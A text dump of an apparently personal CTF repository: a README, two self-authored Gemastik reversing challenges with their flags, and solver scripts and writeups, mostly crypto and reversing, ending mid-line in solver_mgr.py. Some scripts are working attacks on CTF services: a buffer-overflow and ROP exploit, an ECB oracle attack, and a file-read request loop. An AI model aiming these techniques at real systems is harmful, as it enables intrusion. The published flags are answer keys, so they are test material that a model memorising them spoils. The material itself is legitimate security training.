├── README.md ├── challenges ├── 2023 │ └── gemastik │ │ └── FCaaS │ │ ├── README.md │ │ └── public │ │ └── chall └── 2024 │ └── gemastik │ └── 46_68x │ ├── README.md │ └── public │ └── chall └── solver ├── 2020 ├── UIUCTF2020 │ ├── isabelles_file_encryption.md │ └── redds_art.md ├── UNITY2020 │ └── solver_heavy.py ├── UTCTF2020 │ ├── baby_mips.py │ ├── bof.py │ ├── one_true_problem.py │ ├── random_ecb.py │ └── shrek_fans_only.py ├── asisquals2020 │ ├── helper_lpic.py │ ├── solver_lpic.py │ └── solver_mgr.py ├── batpwn2020 │ ├── solver_army.py │ ├── solver_fast.py │ └── solver_noob.py ├── castorsCTF2020 │ ├── bane.md │ ├── quiz.md │ ├── solver_bagelbytes.py │ └── solver_water.py ├── dc9112020 │ ├── solver_rsa.py │ └── solver_triplerotten.py ├── deepCTF2020 │ └── solver_wachan.py ├── redpwn2020 │ └── solver_r1sc.py └── zer0pts2020 │ └── easy_strcmp.py ├── 2021 ├── BtSCTF2021 │ ├── helper_bf.py │ ├── helper_emulator.py │ ├── solver_bf.py │ ├── solver_emulator.py │ ├── solver_shake.py │ └── solver_spin.py ├── IJCTF2021 │ ├── README.md │ ├── Rusty │ ├── family │ ├── hello_world │ ├── helper_rust.py │ ├── sanity │ ├── solver_family.py │ ├── solver_hello.py │ ├── solver_rust.py │ ├── solver_time.py │ └── time ├── angstrom2021 │ ├── debug_ffs │ ├── debug_lockpicking │ ├── solver_flow.py │ ├── solver_free.py │ ├── solver_fss.py │ ├── solver_hrc.py │ ├── solver_infinity.py │ ├── solver_jailbreak.py │ ├── solver_key.py │ ├── solver_random.py │ ├── solver_rsa.py │ ├── solver_sosig.py │ └── solver_xor.py ├── canberra2021 │ ├── helper_enlight.py │ └── tcp_networking.py ├── codefest2021 │ ├── helper_heavy.py │ ├── helper_picture.py │ ├── solver_anime.py │ ├── solver_binary.py │ ├── solver_cbc.py │ ├── solver_heavy.py │ ├── solver_over.py │ ├── solver_pawry.py │ ├── solver_rsa.py │ ├── solver_stream.py │ └── solver_too.py ├── dvCTF2021 │ ├── SolverCryptex.java │ ├── solver_flipping.py │ ├── solver_format.py │ ├── solver_rocca.py │ ├── solver_rsa.py │ └── solver_themore.sage ├── foobar2021 │ ├── solver_child.py │ ├── solver_read.py │ ├── solver_try.py │ └── solver_wargames.py ├── pico2021 │ └── solver_brute.py ├── ritsec2021 │ └── solver_meme.py └── vishwaCTF2021 │ └── solver_flow.py ├── 2022 ├── addactf │ ├── helper_flutter.js │ ├── libnative-lib.so │ ├── solver_coffee.py │ ├── solver_hiddengoald.py │ ├── solver_securitybreach.py │ └── solver_wondermaze.py ├── aractf │ └── solver_securebin.py ├── dicectf │ ├── hist_drive │ └── solver_drive.py ├── finaloscctf │ ├── brute_warmup.py │ ├── solver_admin.py │ ├── solver_factor.py │ ├── solver_misc.py │ └── test_warmup.py ├── findit │ ├── Handler.php │ ├── solver_angle.py │ ├── solver_cry.py │ ├── solver_last.py │ ├── solver_modhex.py │ ├── solver_shuffle.py │ └── swol2.php ├── imaginary │ ├── fix_casino.py │ ├── fix_deobf.py │ ├── helper_otp.py │ ├── helper_pol.py │ ├── helper_revenge.py │ ├── solver_casino.py │ ├── solver_desrever.py │ ├── solver_hidden.py │ ├── solver_jor.py │ ├── solver_otp.py │ ├── solver_pol.py │ └── solver_revenge.py ├── litctf │ ├── fix_sneky.py │ ├── helper_addition.py │ └── solver_min.py ├── mchctf │ ├── SolverMySimpleLogin.java │ ├── solver_RockPaperScissorsLizardSpock.py │ ├── solver_cryptomachine01.py │ ├── solver_cryptomachine02.py │ ├── solver_forauir.py │ ├── solver_hipster.py │ └── solver_pupa.py ├── nitectf │ ├── basically │ │ └── solver.py │ ├── itsybitsyrsa │ │ └── solver.py │ └── shoo-in │ │ └── solver.py ├── oscctf │ ├── fix_book.py │ ├── solver_baby.py │ ├── solver_flip.py │ └── solver_shamir.py ├── tedctf │ ├── Pasted image 20221110122039.png │ ├── Pasted image 20221110122327.png │ ├── Pasted image 20221110123525.png │ ├── Pasted image 20221110123727.png │ └── you_cant_see_me.md ├── typhoon │ └── solver_botnet.py └── uactf │ ├── fix_sus.sage │ └── solver_wat.py ├── 2023 ├── bi0sctf │ ├── bluelock │ │ └── solver.py │ ├── eeriejit │ │ ├── helper.py │ │ └── solver.sage │ └── lowkeyenc │ │ └── solver.py ├── hacktm │ └── re │ │ └── free-play │ │ ├── README.md │ │ ├── images │ │ ├── Pasted image 20230220124225.png │ │ ├── Pasted image 20230220124227.png │ │ ├── Pasted image 20230220124348.png │ │ ├── Pasted image 20230220124434.png │ │ ├── Pasted image 20230220124440.png │ │ ├── Pasted image 20230220124710.png │ │ ├── Pasted image 20230220125116.png │ │ ├── Pasted image 20230220125120.png │ │ ├── Pasted image 20230220125222.png │ │ ├── Pasted image 20230220125302.png │ │ ├── Pasted image 20230220125310.png │ │ └── Pasted image 20230220130944.png │ │ ├── main.wasm │ │ ├── main.wat │ │ ├── reconstructed.py │ │ └── solver.py ├── irisctf │ ├── crypto │ │ ├── aesbad256 │ │ │ ├── helper.py │ │ │ └── solver.py │ │ ├── babymixup │ │ │ └── solver.py │ │ ├── noncesandkeys │ │ │ ├── challenge_enc.sqlite3 │ │ │ ├── db.sqlite3 │ │ │ └── solver.py │ │ ├── notrsa │ │ │ └── solver_notrsa.py │ │ ├── smart1 │ │ │ └── solver.py │ │ └── smart2 │ │ │ └── solver.py │ ├── re │ │ ├── python1 │ │ │ └── solver.py │ │ ├── python2 │ │ │ ├── helper.py │ │ │ ├── helper2.py │ │ │ └── solver2.py │ │ └── scoreboard │ │ │ ├── helper.py │ │ │ ├── solver.py │ │ │ └── tmp.html │ └── web │ │ └── babystretch │ │ └── solver.py ├── lactf │ ├── README.md │ ├── crypto │ │ ├── chinese-lazy-theorem-1 │ │ │ └── solver.py │ │ ├── chinese-lazy-theorem-2 │ │ │ └── solver.sage │ │ ├── guess-the-bit │ │ │ └── solver.py │ │ ├── one-more-time-pad │ │ │ └── solver.py │ │ └── ravin-cryptosystem │ │ │ └── solver.py │ ├── re │ │ ├── ctfd-plus │ │ │ └── solver.py │ │ ├── finals-simulator │ │ │ └── solver.py │ │ ├── snek │ │ │ ├── fickling_pickle.py │ │ │ └── solver.py │ │ ├── switcheroo │ │ │ └── solver.py │ │ └── universal │ │ │ └── solver.py │ └── web │ │ ├── 85_reasons_why │ │ └── solver.py │ │ └── uuid-hell │ │ ├── leak_uuid.py │ │ └── solver.py └── utctf │ ├── README.md │ ├── crypto │ └── affinity │ │ └── solver.py │ ├── misc │ └── zipper │ │ └── solver.py │ ├── re │ ├── adventurerom │ │ └── solver.py │ ├── game │ │ └── solver │ └── lookscorrect │ │ └── solver.py │ └── web │ └── calculator │ └── solver.py └── lifetime └── cryptopals └── 01 ├── 1.py ├── 2.py ├── 3.py ├── 4.py ├── 4.txt ├── 5.py ├── 6.py ├── 6.txt ├── 7.py ├── 7.txt ├── 8.py ├── 8.txt └── hamming-distance.py /README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Note 3 | - You can see the detailed writeup at the following [link](https://blog.ryukk.dev/ctfs) 4 | 5 | ## My Challenge 6 | ### Gemastik 2024 7 | | Name | Category | Tags | Difficulty | 8 | | -------- | ---------- | ---- | ---------- | 9 | | [46_68x](challenges/2024/gemastik/46_68x) | RE | Flag Checker, VM, Modified Crypto Algorithm | medium | 10 | 11 | ### Gemastik 2023 12 | | Name | Category | Tags | Difficulty | 13 | | -------- | ---------- | ---- | ---------- | 14 | | [FCaaS](challenges/2023/gemastik/FCaaS) | RE | Flag Checker, Runtime ELF Generation | easy-medium | 15 | 16 | ## Past CTF Solution 17 | | Year | CTF Name | 18 | | -------- | ------------ | 19 | | 2023 | utctf, nullcon (todo), kalmar (todo), acsc (todo), lactf, bi0sctf, irisctf | 20 | | 2022 | nitectf (Partial Solution), final oscctf, uactf, aractf, dicectf, findit, imaginary, litctf, mchctf, oscctf, typhoon | 21 | | 2021 | IJCTF, BtSCTF, CodefestCTF, PicoCTF, FoobarCTF, angstromCTF, BSidesCanberraCTF, RitsecCTF, DVCTF, vishwaCTF, [DarkConCTF](https://kos0ng.medium.com/reverse-engineering-darkcon-ctf-2021-a8060717b1e3), [BSidesDelhiCTF](https://kos0ng.medium.com/writeup-reverse-engineering-bsides-delhi-ctf-2020-8a3f8bc92fb) | 22 | | 2020 | UIUCTF, AsisQuals, Defcon911, [FirstCTF](https://kos0ng.medium.com/write-up-first-challenge-2020-2e2ff284d590), Redpwn, Batpwn, [CastorsCTF](https://medium.com/@ret2ex/reverse-engineering-castors-ctf-2020-b80ce7a4670), [DeepCTF](https://kos0ng.medium.com/reverse-engineering-deep-ctf-2020-ac9e83aa266d), UNITYQualification, UTCTF, zer0pts | 23 | | Lifetime | cryptopals | 24 | 25 | ## Unmanaged Solver 26 | - [gist.github.com](http://gist.github.com/kos0ng) -------------------------------------------------------------------------------- /challenges/2023/gemastik/FCaaS/README.md: -------------------------------------------------------------------------------- 1 | # FCaaS 2 | 3 | ## Flag 4 | ``` 5 | gemastik{you_know_the_pattern_you_got_the_flag} 6 | ``` 7 | ## Description 8 | Like usual flag checker. Nothing new, but now running as a service 9 | 10 | ## Writeup 11 | [blog.ryukk.dev](https://blog.ryukk.dev/ctfs/write-up/2023/gemastik-quals/reverse-engineering#fcaas-0-solve) 12 | -------------------------------------------------------------------------------- /challenges/2023/gemastik/FCaaS/public/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/challenges/2023/gemastik/FCaaS/public/chall -------------------------------------------------------------------------------- /challenges/2024/gemastik/46_68x/README.md: -------------------------------------------------------------------------------- 1 | # 46_68x 2 | 3 | ## Flag 4 | ``` 5 | gemastik{i_7e4rN_to_D3vel0p_ch41nEd_RC4_0n_VM} 6 | ``` 7 | ## Description 8 | x86_64 architecture is hard to learn, so i decided to create my own architecture called 46_68x. 9 | 10 | ## Writeup 11 | TODO -------------------------------------------------------------------------------- /challenges/2024/gemastik/46_68x/public/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kos0ng/ctf-writeups/4a28087d247f5721b8e0ee6083399ace5def9a84/challenges/2024/gemastik/46_68x/public/chall -------------------------------------------------------------------------------- /solver/2020/UIUCTF2020/isabelles_file_encryption.md: -------------------------------------------------------------------------------- 1 | # isabelles_file_encryption ( Cryptography ) Writeup 2 | 3 | Given `blackmail_encrypted` and `super_secret_encryption.py` , here is the code in `super_secret_encryption.py` 4 | ``` 5 | #!/usr/bin/python 6 | 7 | # password-protect your files with this super powerful encryption! 8 | def super_secret_encryption(file_name, password): 9 | with open(file_name, "rb") as f: 10 | plaintext = f.read() 11 | 12 | assert(len(password) == 8) # I heard 8 character long passwords are super strong! 13 | assert(password.decode("utf-8").isalpha()) # The numbers on my keyboard don't work... 14 | assert(b"Isabelle" in plaintext) # Only encrypt files Isabelle has been mentioned in 15 | add_spice = lambda b: 0xff & ((b << 1) | (b >> 7)) 16 | ciphertext = bytearray(add_spice(c) ^ password[i % len(password)] for i, c in enumerate(plaintext)) 17 | 18 | with open(file_name + "_encrypted", "wb") as f: 19 | f.write(ciphertext) 20 | 21 | # use this to decrypt the file with the same password! 22 | def super_secret_decryption(file_name, password): 23 | with open(file_name + "_encrypted", "rb") as f: 24 | ciphertext = f.read() 25 | 26 | remove_spice = lambda b: 0xff & ((b >> 1) | (b << 7)) 27 | plaintext = bytearray(remove_spice(c ^ password[i % len(password)]) for i, c in enumerate(ciphertext)) 28 | 29 | with open(file_name + "_decrypted", "wb") as f: 30 | f.write(plaintext) 31 | 32 | with open("password", "rb") as f: # I got too lazy typing it in each time 33 | password = f.read() #Make sure to encrypt the text in the middle!!! 34 | super_secret_encryption("blackmail", password) 35 | super_secret_decryption("blackmail", password) 36 | ``` 37 | 38 | By analyzing the code we know that there must be `Isabelle` string in plaintext . The length of `Isabelle` is 8 and the length of password must be 8 and password is only alphabet ( uppercase and lowercase ) . So we can conclude that we can get the password by bruteforcing the encrypted text. The algorithm that we will use is encrypt `Isabelle` and compare it with encrypted text every 8 characters , if the key length is 8 that will be a possible key. 39 | ``` 40 | #solver_isabelles.py 41 | import string 42 | 43 | def super_secret_encryption(plaintext, password): 44 | add_spice = lambda b: 0xff & ((b << 1) | (b >> 7)) 45 | return add_spice(ord(plaintext))^ord(password) 46 | 47 | def super_secret_decryption(password): 48 | with open("real_enc_encrypted", "rb") as f: 49 | ciphertext = f.read() 50 | 51 | remove_spice = lambda b: 0xff & ((b >> 1) | (b << 7)) 52 | plaintext = bytearray(remove_spice(ord(c) ^ ord(password[i % len(password)])) for i, c in enumerate(ciphertext)) 53 | 54 | print plaintext 55 | 56 | f=open("real_enc_encrypted","r") 57 | a=f.read() 58 | list_char=string.uppercase+string.lowercase 59 | plain="Isabelle" 60 | print "Possible key :" 61 | for k in range(len(a)): 62 | tmp=a[k:k+8] 63 | key="" 64 | for i in range(len(tmp)): 65 | for j in list_char: 66 | if(super_secret_encryption(plain[i],j)==ord(tmp[i])): 67 | key+=j 68 | break 69 | if(len(key)==8): 70 | print key 71 | 72 | #password=raw_input() 73 | #super_secret_decryption(password) 74 | ``` 75 | The result is 76 | ``` 77 | Possible key : 78 | cIYoDsdT 79 | lLEiSaBe 80 | aBelLEiS 81 | lLEiSaBe 82 | MlutZWUc 83 | EiSaBelL 84 | ``` 85 | If you look at the possible key there is most likely key , `lLEiSaBe/EiSaBelL/aBelLEiS`. By rearrange it we get `iSaBelLE` and then try to decrypt the `blackmail_encrypted` ( here i change the name to real_enc_encrypted ). Run that script again by commenting `bruteforce key algorithm` and uncomment the `decryption algorithm` . 86 | `python solver_isabelles.py | strings | grep uiu` 87 | Result 88 | ``` 89 | iSaBelLE 90 | You can take this flag as a sign I'm being serious: uiuctf{winner_winner_raccoon_dinner} 91 | ``` 92 | 93 | ## Flag : uiuctf{winner_winner_raccoon_dinner} -------------------------------------------------------------------------------- /solver/2020/UIUCTF2020/redds_art.md: -------------------------------------------------------------------------------- 1 | # Redd's Art ( Reverse Engineering ) Writeup 2 | 3 | At first i tried to run the binary and the output seems like conversation which asked for input several times. If we send `no` as input for 2 times ( after sending name ) the output will be string like flag but it just a fake flag ( uiuctf{v3Ry_r341_@rTT} ). 4 | 5 | After that i tried to look at main function and didn't find anything useful. There is `gets` function called in main but this is `reversing` challenge not pwn challenge and the result from `checksec` made it more obvious. 6 | ``` 7 | [*] '/home/kosong/ctf/uiuctf_2020/ReddsArt' 8 | Arch: amd64-64-little 9 | RELRO: Full RELRO 10 | Stack: Canary found 11 | NX: NX enabled 12 | PIE: PIE enabled 13 | ``` 14 | then i tried to look at another function and found something fishy. That function is sub_A5A(). 15 | ``` 16 | char *sub_A5A() 17 | { 18 | char *result; // rax 19 | int i; // [rsp+0h] [rbp-10h] 20 | char v2; // [rsp+4h] [rbp-Ch] 21 | 22 | v2 = sub_91A(); 23 | result = byte_973; 24 | for ( i = 0; i <= 230; ++i ) 25 | { 26 | result = &byte_973[i]; 27 | *result ^= v2; 28 | } 29 | return result; 30 | } 31 | ``` 32 | and here is function sub_91A. 33 | ``` 34 | __int64 sub_91A() 35 | { 36 | unsigned int v1; // [rsp+8h] [rbp-18h] 37 | int i; // [rsp+Ch] [rbp-14h] 38 | 39 | v1 = 0; 40 | for ( i = 0; i < strlen(s); ++i ) 41 | v1 += s[i]; 42 | return v1; 43 | } 44 | ``` 45 | s = "uiuctf{v3Ry_r341_@rTT}" , so we can call that function using `gdb` or reconstruct that code then run it. 46 | ``` 47 | gef➤ p (int) 0x55555555491a() 48 | $1 = 0x81e 49 | ``` 50 | now we know the return value from sub_91A, so the next step is trying to reconstruct sub_A5A function , because we cannot call it directly ( segmentation fault ). 51 | ``` 52 | #solver_redds.py 53 | a=[0x4b,0x56,0x97,0xfb,0x4d,0x56,0x9d,0xf2,0x36,0x56,0xd9,0x5b,0xf6,0x17,0x1e,0x1e,0x1e,0x56,0x95,0x5b,0xf6,0x11,0xa8,0x1e,0x56,0x11,0xa0,0xde,0x56,0x1f,0x5b,0xf6,0x56,0x95,0x5b,0xf6,0x11,0xa8,0x1e,0x96,0x5b,0xc5,0xd9,0x5b,0xc2,0x1e,0x1e,0x1e,0x1e,0xf5,0x2c,0x56,0x95,0x0b,0x65,0x08,0x3e,0x1e,0x95,0x5b,0xc2,0x56,0x86,0x56,0x1f,0xce,0x11,0xa8,0x1e,0x97,0xdc,0x11,0xa8,0x5b,0xc5,0x93,0x12,0x1c,0x56,0x95,0x0b,0x7e,0x08,0x3e,0x1e,0x95,0x5b,0xc2,0x56,0x86,0x56,0x1f,0xce,0x97,0xd4,0x96,0x0e,0x9d,0x5b,0xc2,0x1f,0x95,0x5b,0xc2,0x56,0x7d,0xc6,0x56,0x95,0x1b,0x5d,0x08,0x3e,0x1e,0x56,0x97,0xd9,0xf6,0xad,0xe3,0xe1,0xe1,0x56,0x27,0xdd,0x6c,0xaa,0xa6,0x1e,0x1e,0x1e,0x1e,0xf6,0x00,0xe1,0xe1,0xe1,0x97,0x5b,0xfa,0xd9,0x5b,0xfe,0x1e,0x1e,0x1e,0x1e,0xf5,0x2e,0x56,0x95,0x0b,0x07,0x08,0x3e,0x1e,0x95,0x5b,0xfe,0x56,0x86,0x56,0x1f,0xce,0x11,0xa8,0x16,0x95,0x5b,0xfa,0x97,0xd8,0x56,0x95,0x0b,0x1c,0x08,0x3e,0x1e,0x95,0x5b,0xfe,0x56,0x86,0x56,0x1f,0xce,0x2f,0xef,0x97,0xd4,0x96,0x0e,0x9d,0x5b,0xfe,0x1f,0x95,0x5b,0xfe,0x56,0x7d,0xc6,0x56,0x95,0x1b,0xfd,0x0b,0x3e,0x1e,0x56,0x97,0xd9,0xf6,0x4d,0xe3,0xe1,0xe1,0x56,0x27,0xdd,0x6c,0xa8,0x8e,0x56,0x9d,0xda,0x36,0x45,0x43,0xdd] // byte_973 54 | key=0x81e 55 | result="" 56 | for i in a: 57 | result+=chr((i^key)&0xff) 58 | print result 59 | ``` 60 | The result is weird and finally i realized that the result is `machine code` . We can convert it to assembly language using `ndisasm`. 61 | 62 | `python solver_redds.py | ndisasm -u -b 64 -` 63 | here is the result 64 | ``` 65 | 00000000 55 push rbp 66 | 00000001 4889E5 mov rbp,rsp 67 | 00000004 53 push rbx 68 | 00000005 4883EC28 sub rsp,byte +0x28 69 | --------------------------------------------------- 70 | 000000E4 5B pop rbx 71 | 000000E5 5D pop rbp 72 | 000000E6 C3 ret 73 | 000000E7 0A db 0x0a 74 | ``` 75 | so the next step i do is try to patch it by scripting with python. Find the correct offset using hex editor then patch it! 76 | ``` 77 | #solver_redds.py 78 | f=open("ReddsArt","r") 79 | b=f.read() 80 | key=0x81e 81 | c="" 82 | for i in range(len(b)): 83 | if(i>0x972 and i<0xa5a): 84 | c+=chr((ord(b[i])^key)&0xff) 85 | else: 86 | c+=b[i] 87 | print c 88 | ``` 89 | then redirect the output to file 90 | `python solver_redds.py > newredds` 91 | After that i tried to run it and it is work normally and then i tried to open it in IDA. IDA will recognize byte_973 as valid function ( after we patched it ) . 92 | ``` 93 | size_t sub_973() 94 | { 95 | size_t result; // rax 96 | int i; // [rsp+Ch] [rbp-24h] 97 | int j; // [rsp+10h] [rbp-20h] 98 | char v3; // [rsp+14h] [rbp-1Ch] 99 | 100 | for ( i = 0; i < strlen(off_202028); ++i ) 101 | off_202028[i] += 3; 102 | v3 = sub_91A(); 103 | for ( j = 0; ; ++j ) 104 | { 105 | result = strlen(off_202028); 106 | if ( j >= result ) 107 | break; 108 | off_202028[j] ^= v3; 109 | } 110 | return result; 111 | } 112 | ``` 113 | So the final step is reconstruct the sub_973 function and got the flag! 114 | ``` 115 | off_202028="hthzgubI>*ww7>z+Ha,m>W,7z+hmG" 116 | flag="" 117 | for i in off_202028: 118 | flag+=chr((ord(i)+3)^0x1e) 119 | print flag 120 | ``` 121 | 122 | ## Flag : uiuctf{R_3dd$_c0Uz1n_D1$c0unT} 123 | -------------------------------------------------------------------------------- /solver/2020/UNITY2020/solver_heavy.py: -------------------------------------------------------------------------------- 1 | import string 2 | 3 | def shiftloop(tmp,countshift,countloop,shift): 4 | if(shift=='right'): 5 | for i in range(countloop,0,-1): 6 | shiftright(tmp,countshift) 7 | else: 8 | for i in range(countloop,0,-1): 9 | shiftleft(tmp,countshift) 10 | 11 | def shiftleft(tmp,count): 12 | tmp2=tmp[0] 13 | for i in range(count-1): 14 | tmp[i]=tmp[i+1] 15 | tmp[count-1]=tmp2 16 | return tmp 17 | 18 | def shiftright(tmp,count): 19 | tmp2=tmp[count-1] 20 | for i in range(count-1,0,-1): 21 | tmp[i]=tmp[i-1] 22 | tmp[0]=tmp2 23 | return tmp 24 | 25 | data=[0x0000002e,0xffffff8a,0xffffffa9,0xfffffff8,0x0000000b,0xffffffca,0x00000026,0x00000077,0x00000067,0x00000077,0x00000025,0x00000057,0xffffffc2,0x00000052,0xffffffd1,0xfffffff2,0x00000023,0xffffff72,0xffffff46,0xffffff24,0xffffff46,0xffffff24,0xffffff2c,0x0000008e] 26 | inputan=[0]*24 27 | local_b0 = 0 28 | while (local_b0 < 6): 29 | inputan[local_b0] = (data[local_b0] ^ 0x5c)&0xff 30 | local_b0 += 1 31 | local_ac = 6 32 | while (local_ac < 0xc): 33 | inputan[local_ac] = (data[local_ac] - 0x30)&0xff 34 | local_ac += 1 35 | local_a8 = 0xc 36 | while (local_a8 < 0x12): 37 | inputan[local_a8] = (data[local_a8] + 0x24)&0xff 38 | local_a8 += 1 39 | local_a4 = 0x12 40 | while (local_a4 < 0x18): 41 | inputan[local_a4] = (data[local_a4] / 2) &0xff 42 | local_a4 += 1 43 | 44 | local_b8 = 3 45 | while(local_b8 >=0 ): 46 | if ((local_b8 & 1) != 0): 47 | tmp_input=inputan[local_b8*6:(local_b8+1)*6] 48 | shiftloop(tmp_input,6,local_b8+1,'left') 49 | inputan[local_b8*6:(local_b8+1)*6]=tmp_input 50 | else: 51 | tmp_input=inputan[local_b8*6:(local_b8+1)*6] 52 | shiftloop(tmp_input,6,local_b8+1,'right') 53 | inputan[local_b8*6:(local_b8+1)*6]=tmp_input 54 | local_b8-=1 55 | 56 | for i in range(9): 57 | list_dict={} 58 | for j in string.printable[:-6]: 59 | list_dict[((ord(j) << (8 - i)) | (ord(j) >> i))&0xff]=j 60 | tmp_flag="" 61 | for j in inputan: 62 | try: 63 | tmp_flag+=list_dict[j] 64 | except Exception as e: 65 | tmp_flag+='x' 66 | print str(i)+" = "+tmp_flag 67 | if("x" not in tmp_flag): 68 | flag=tmp_flag 69 | print "==================================" 70 | for i in string.printable[:-6]: 71 | if(ord(i)+0x8c&0x1f==4): 72 | print "Flag: "+flag+i 73 | 74 | 75 | -------------------------------------------------------------------------------- /solver/2020/UTCTF2020/baby_mips.py: -------------------------------------------------------------------------------- 1 | a=[0x62,0x6c,0x7f,0x76,0x7a,0x7b,0x66,0x73,0x76,0x50,0x52,0x7d,0x40,0x54,0x55,0x79,0x40,0x49,0x47,0x4d,0x74,0x19,0x7b,0x6a,0x42,0x0a,0x4f,0x52,0x7d,0x69,0x4f,0x53,0x0c,0x64,0x10,0x0f,0x1e,0x4a,0x67,0x03,0x7c,0x67,0x02,0x6a,0x31,0x67,0x61,0x37,0x7a,0x62,0x2c,0x2c,0x0f,0x6e,0x17,0x00,0x16,0x0f,0x16,0x0a,0x6d,0x62,0x73,0x25,0x39,0x76,0x2e,0x1c,0x63,0x78,0x2b,0x74,0x32,0x16,0x20,0x22,0x44,0x19] 2 | print len(a) 3 | flag="" 4 | j=0 5 | for i in a: 6 | flag+=chr(i^j+0x17) 7 | j+=1 8 | print flag -------------------------------------------------------------------------------- /solver/2020/UTCTF2020/bof.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # r=process("./pwnable") 3 | 4 | # gdb.attach(r,""" 5 | # b *0x00000000004005ea 6 | # b *0x00000000004005d9 7 | # c 8 | # """) 9 | r=remote("binary.utctf.live",9002) 10 | r.recvuntil("one!") 11 | pop_ret=0x0000000000400693 12 | payload="a"*120+p64(pop_ret)+p64(0xdeadbeef)+p64(0x00000000004005ea) 13 | r.sendline(payload) 14 | r.interactive() 15 | -------------------------------------------------------------------------------- /solver/2020/UTCTF2020/one_true_problem.py: -------------------------------------------------------------------------------- 1 | a="213c234c2322282057730b32492e720b35732b2124553d354c22352224237f1826283d7b0651".decode("hex") 2 | b="THE BEST CTF CATEGORY IS CRYPTOGRAPHY!" 3 | c=[ord(i) for i in b] 4 | flag="" 5 | for i in range(len(a)): 6 | flag+=chr(ord(a[i])^c[i]) 7 | print flag 8 | -------------------------------------------------------------------------------- /solver/2020/UTCTF2020/random_ecb.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import string 3 | 4 | r=remote("ecb.utctf.live",9003) 5 | payload="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 6 | flag="" 7 | counter=0 8 | before=['',''] 9 | while(len(payload)!=0): 10 | print "FLAG : "+flag 11 | if(counter==0): 12 | while(before[0]==before[1]): 13 | r.recvuntil(":\n") 14 | r.sendline(payload) 15 | r.recvuntil(":)") 16 | r.recvline() 17 | y=r.recvline()[:-1] 18 | before[0]=y[0:32] 19 | before[1]=y[32:64] 20 | counter+=1 21 | payload=payload[1:] 22 | flag+='u' 23 | else: 24 | while(y[0:32]==before[0] and y[32:64]==before[1]): 25 | r.recvuntil(":\n") 26 | r.sendline(payload) 27 | r.recvuntil(":)") 28 | r.recvline() 29 | y=r.recvline()[:-1] 30 | tmp=[y[0:32],y[32:64]] 31 | cond=True 32 | for i in string.printable[:-6]: 33 | tmp2=[] 34 | while(len(tmp2)!=2): 35 | x=payload+flag+i 36 | r.recvuntil(":\n") 37 | r.sendline(x) 38 | r.recvuntil(":)") 39 | r.recvline() 40 | y=r.recvline()[:-1] 41 | if(y not in tmp2): 42 | tmp2.append(y) 43 | if(y[0:32]==tmp[0] and y[32:64]==tmp[1]): 44 | before[0]=y[0:32] 45 | before[1]=y[32:64] 46 | payload=payload[1:] 47 | cond=False 48 | flag+=i 49 | break 50 | if(cond==False): 51 | break 52 | -------------------------------------------------------------------------------- /solver/2020/UTCTF2020/shrek_fans_only.py: -------------------------------------------------------------------------------- 1 | import requests,base64 2 | 3 | r=requests.Session() 4 | while(True): 5 | x=raw_input("input : ") 6 | x=base64.b64encode(x) 7 | print "http://3.91.17.218/getimg.php?img="+x 8 | print r.get("http://3.91.17.218/getimg.php?img="+x).text[:-1] -------------------------------------------------------------------------------- /solver/2020/asisquals2020/helper_lpic.py: -------------------------------------------------------------------------------- 1 | # from pwn import * 2 | import string 3 | import os 4 | 5 | f=open("real.txt","r") 6 | a=f.read()[2:-1] 7 | f.close() 8 | for x in string.printable[:-6]: 9 | # flag="ASIS{Y3s_asis_L0ves_i0ccc_and_lov3s_obfuscati0ns_and_C_For3ver"+x 10 | flag="flag with afterward character not found" 11 | for i in range(len(flag),len(flag)+1): 12 | tmp_flag=[] 13 | for j in string.printable[:-6]: 14 | f=open("flag.txt","w") 15 | f.write(flag+j) 16 | f.close() 17 | os.system("./prog flag && dd if=flag of=flag.txt conv=notrunc bs=1 skip=1 status=none") 18 | f=open("flag.txt","r") 19 | tmp=f.read()[2:-1] 20 | f.close() 21 | try: 22 | if(a[0:len(tmp)]==tmp): 23 | tmp_flag.append(j) 24 | except: 25 | continue 26 | if(tmp_flag!=[]): 27 | print x,tmp_flag -------------------------------------------------------------------------------- /solver/2020/asisquals2020/solver_lpic.py: -------------------------------------------------------------------------------- 1 | import string 2 | import os 3 | 4 | f=open("real.txt","r") 5 | a=f.read()[2:-1] 6 | f.close() 7 | # flag="ASIS{Y3s_asis_L0ves_i0ccc_and_lov3s_obfuscati0ns_and_C_For3v3r3}" 8 | flag="" 9 | for i in range(len(flag),64): 10 | print flag 11 | tmp_flag=[] 12 | for j in string.printable[:-6]: 13 | f=open("flag.txt","w") 14 | f.write(flag+j) 15 | f.close() 16 | os.system("./prog flag && dd if=flag of=flag.txt conv=notrunc bs=1 skip=1 status=none") 17 | f=open("flag.txt","r") 18 | tmp=f.read()[2:-1] 19 | f.close() 20 | try: 21 | if(a[0:len(tmp)]==tmp): 22 | tmp_flag.append(j) 23 | except: 24 | continue 25 | print tmp_flag 26 | maybe_flag=[] 27 | for j in tmp_flag: 28 | for k in string.printable[:-6]: 29 | f=open("flag.txt","w") 30 | f.write(flag+j+k) 31 | f.close() 32 | os.system("./prog flag && dd if=flag of=flag.txt conv=notrunc bs=1 skip=1 status=none") 33 | f=open("flag.txt","r") 34 | tmp=f.read()[2:-1] 35 | f.close() 36 | try: 37 | if(a[0:len(tmp)]==tmp): 38 | maybe_flag.append(j) 39 | break 40 | except: 41 | continue 42 | print maybe_flag 43 | if(len(maybe_flag)==1): 44 | flag+=maybe_flag[0] 45 | else: 46 | break -------------------------------------------------------------------------------- /solver/2020/asisquals2020/solver_mgr.py: -------------------------------------------------------------------------------- 1 | 2 | f=open("real.enc","r") 3 | 4 | a2=list(f.read()[:-1]) 5 | a5=9 6 | a1_8=[0xde,0xd9,0xa1,0xf9,0xed,0xc0,0xa8,0xff,0xe1,0xd6,0xac,0x91,0xa0,0xc6,0xe7,0xf2,0xbc,0xa6,0xe6,0xf9,0xb2,0xab,0xaf,0xab,0xbd,0xee,0xbc,0xf7,0xb1,0xfc,0xbb,0xae,0xdd,0x9a,0xcb,0x80,0xc8,0xd8,0x96,0xd4,0xbc] 7 | a1_18=0xa5 8 | a1_16=0x29 9 | v6=0xa5 10 | a4=83 11 | flag="" 12 | for i in range(a4): 13 | flag+=chr(a1_8[(i ^ v6) % 